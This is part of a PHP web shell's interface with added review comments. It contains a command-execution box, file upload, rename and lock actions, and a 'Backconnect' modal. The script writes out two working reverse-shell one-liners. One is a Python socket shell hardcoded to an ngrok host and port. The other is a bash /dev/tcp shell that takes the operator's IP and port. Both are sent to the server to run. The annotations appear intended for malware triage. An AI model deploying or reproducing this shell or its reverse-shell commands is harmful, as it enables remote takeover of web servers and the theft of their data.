<a href="?lockfolder&dir=<?= urlencode($currentDir) ?>"><button class="gaktau">Lock All Dir</button></a>
</center>
<br>
<!-- Backconnect Modal -->
<div id="backconnectModal" class="modal">
<div class="modal-content">
<span class="close" onclick="closeBackconnectModal()">×</span>
<h2>Backconnect</h2>
<input type="text" id="ipAddress" placeholder="IP Address">
<input type="text" id="port" placeholder="Port">
<select id="backconnectType">
<option value="python">Python</option>
<option value="bash">Bash</option>
</select>
<button onclick="initiateBackconnect()">Connect</button>
</div>
</div>
<!-- CMD Modal -->
<div id="cmdModal" class="modal">
<div class="modal-content">
<span class="close" onclick="closeCmdModal()">×</span>
<h2>CMD</h2>
<input type="text" id="cmdInput" placeholder="Enter command">
<button onclick="executeCmd()">Execute</button>
<div id="cmdOutput" class="cmd-output">Output Disini</div>
</div>
</div>
<!-- JavaScript for the modals, the command/backconnect requests, folder/file creation, rename and lock actions -->
<script>
    // Shows the backconnect modal.
    function openBackconnectModal() {
        document.getElementById('backconnectModal').style.display = 'block';
    }

    // Hides the backconnect modal.
    function closeBackconnectModal() {
        document.getElementById('backconnectModal').style.display = 'none';
    }

    // Builds a shell command string from the modal fields and POSTs it to this
    // script under the query key "backconnect" as form field "command".
    // NOTE(review): the receiving handler is not in this part of the file. For triage,
    // the observable request is a POST to "?backconnect" with a body starting "command=".
    function initiateBackconnect() {
        const ipAddress = document.getElementById('ipAddress').value;
        const port = document.getElementById('port').value;
        const backconnectType = document.getElementById('backconnectType').value;
        // Both fields are required, whichever type is selected.
        if (!ipAddress || !port) {
            alert('Please enter both IP Address and Port.');
            return;
        }
        let command;
        if (backconnectType === 'python') {
            // NOTE(review): this branch never interpolates ipAddress or port. The host and
            // port are fixed literals in the string, so the connection target is the same
            // whatever the operator typed - treat the literal endpoint as a network
            // indicator belonging to this sample.
            command = `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ap.ngrok.io",19861));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`;
        } else if (backconnectType === 'bash') {
            // Only this branch uses the operator-supplied address and port; they are placed
            // into the string as typed, with no validation beyond the non-empty check above.
            command = `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`;
        }
        // Send the command to the server for execution.
        // If backconnectType matched neither branch, command is still undefined here and
        // encodeURIComponent() sends the text "undefined".
        fetch('?backconnect', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            body: `command=${encodeURIComponent(command)}`
        })
        .then(response => response.text())
        .then(data => {
            alert('Backconnect initiated: ' + data);
            closeBackconnectModal();
        })
        .catch(error => {
            alert('Error initiating backconnect: ' + error);
        });
    }

    // Prompts for a folder name and submits the hidden folderForm
    // (fields folder_name and new_folder=1). Does nothing on an empty or cancelled prompt.
    function createFolder() {
        let folderName = prompt("Enter folder name:");
        if (folderName) {
            document.getElementById("folderName").value = folderName;
            document.getElementById("folderForm").submit();
        }
    }

    // Prompts for a file name and submits the hidden fileForm
    // (fields file_name and new_file=1). Does nothing on an empty or cancelled prompt.
    function createFile() {
        let fileName = prompt("Enter file name:");
        if (fileName) {
            document.getElementById("fileName").value = fileName;
            document.getElementById("fileForm").submit();
        }
    }

    // Resizes a textarea to fit its content: the height is reset first so that
    // scrollHeight reflects the content rather than the previous height.
    function adjustTextareaSize(textarea) {
        textarea.style.height = 'auto';
        textarea.style.height = (textarea.scrollHeight) + 'px';
    }

    // Appends a div with classes "notification" and the given type to the body and
    // removes it after 3000 ms. The message is assigned through textContent, so it is
    // not parsed as HTML.
    function showNotification(message, type = 'success') {
        const notification = document.createElement('div');
        notification.className = `notification ${type}`;
        notification.textContent = message;
        document.body.appendChild(notification);
        setTimeout(() => {
            notification.remove();
        }, 3000);
    }

    // Shows the CMD modal.
    function openCmdModal() {
        document.getElementById('cmdModal').style.display = 'block';
    }

    // Hides the CMD modal.
    function closeCmdModal() {
        document.getElementById('cmdModal').style.display = 'none';
    }

    // POSTs the text of #cmdInput to this script under the query key "cmd" as form
    // field "command" and writes the response body into #cmdOutput.
    // NOTE(review): the receiving handler is not in this part of the file. For triage,
    // the observable request is a POST to "?cmd" with a body starting "command=".
    function executeCmd() {
        const cmdInput = document.getElementById('cmdInput').value;
        if (!cmdInput) {
            alert('Please enter a command.');
            return;
        }
        fetch('?cmd', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            body: `command=${encodeURIComponent(cmdInput)}`
        })
        .then(response => response.text())
        .then(data => {
            // innerText, so the response is displayed as text rather than parsed as HTML.
            document.getElementById('cmdOutput').innerText = data;
        })
        .catch(error => {
            document.getElementById('cmdOutput').innerText = 'Error executing command: ' + error;
        });
    }

    // After a confirm() dialog, navigates to "?lockunlock=<itemPath>&dir=<current dir>".
    // NOTE(review): both arms of the first ternary are the same string, so isDirectory
    // only changes the word "directory"/"file" in the prompt.
    // NOTE(review): $currentDir is written by PHP straight into a single-quoted JavaScript
    // string with no escaping, so a directory name containing a quote or backslash alters
    // this script as delivered to the browser.
    function lockUnlockItem(itemPath, isDirectory = false) {
        if (confirm(`Are you sure you want to ${isDirectory ? 'lock/unlock' : 'lock/unlock'} this ${isDirectory ? 'directory' : 'file'}?`)) {
            window.location.href = `?lockunlock=${encodeURIComponent(itemPath)}&dir=${encodeURIComponent('<?= $currentDir ?>')}`;
        }
    }

    // Prompts for a new name and, if it differs from the current one, builds and submits
    // a hidden POST form to the current URL. Fields sent for a directory:
    // rename_dir_submit=1, new_name, rename_dir=<old path>; for a file: rename_file=1,
    // new_name, rename=<old path>.
    function renameItem(itemPath, isDirectory = false) {
        // The current name is the last "/"-separated segment, so a path using another
        // separator is shown whole in the prompt.
        let currentName = itemPath.split('/').pop();
        let newName = prompt(`Enter new name for ${isDirectory ? 'directory' : 'file'}:`, currentName);
        if (newName && newName !== currentName) {
            let form = document.createElement('form');
            form.method = 'post';
            form.action = '';
            // Marker field telling the server which rename action is requested.
            let inputPath = document.createElement('input');
            inputPath.type = 'hidden';
            inputPath.name = isDirectory ? 'rename_dir_submit' : 'rename_file';
            inputPath.value = '1';
            form.appendChild(inputPath);
            let inputNewName = document.createElement('input');
            inputNewName.type = 'hidden';
            inputNewName.name = 'new_name';
            inputNewName.value = newName;
            form.appendChild(inputNewName);
            // Despite the variable name above, this is the field that carries the old path.
            let inputOldPath = document.createElement('input');
            inputOldPath.type = 'hidden';
            inputOldPath.name = isDirectory ? 'rename_dir' : 'rename';
            inputOldPath.value = itemPath;
            form.appendChild(inputOldPath);
            document.body.appendChild(form);
            form.submit();
        }
    }

    // Once the DOM is ready, auto-size the first textarea on the page (if any) and keep
    // it sized as the user types.
    document.addEventListener('DOMContentLoaded', function() {
        const textarea = document.querySelector('textarea');
        if (textarea) {
            textarea.addEventListener('input', function() {
                adjustTextareaSize(this);
            });
            adjustTextareaSize(textarea);
        }
    });

    // Trigger file upload when the "Upload File" button is clicked:
    // the submit is cancelled and the hidden file input is opened instead.
    document.querySelector('.upload-btn').addEventListener('click', function(e) {
        e.preventDefault();
        document.getElementById('fileUpload').click();
    });

    // Automatically submit the form when a file is selected
    document.getElementById('fileUpload').addEventListener('change', function() {
        document.getElementById('uploadForm').submit();
    });
</script>
<!-- Directory Listing: HTML returned by listDirectories(), defined earlier in this file -->
<?= listDirectories($currentDir) ?>
</body> </html>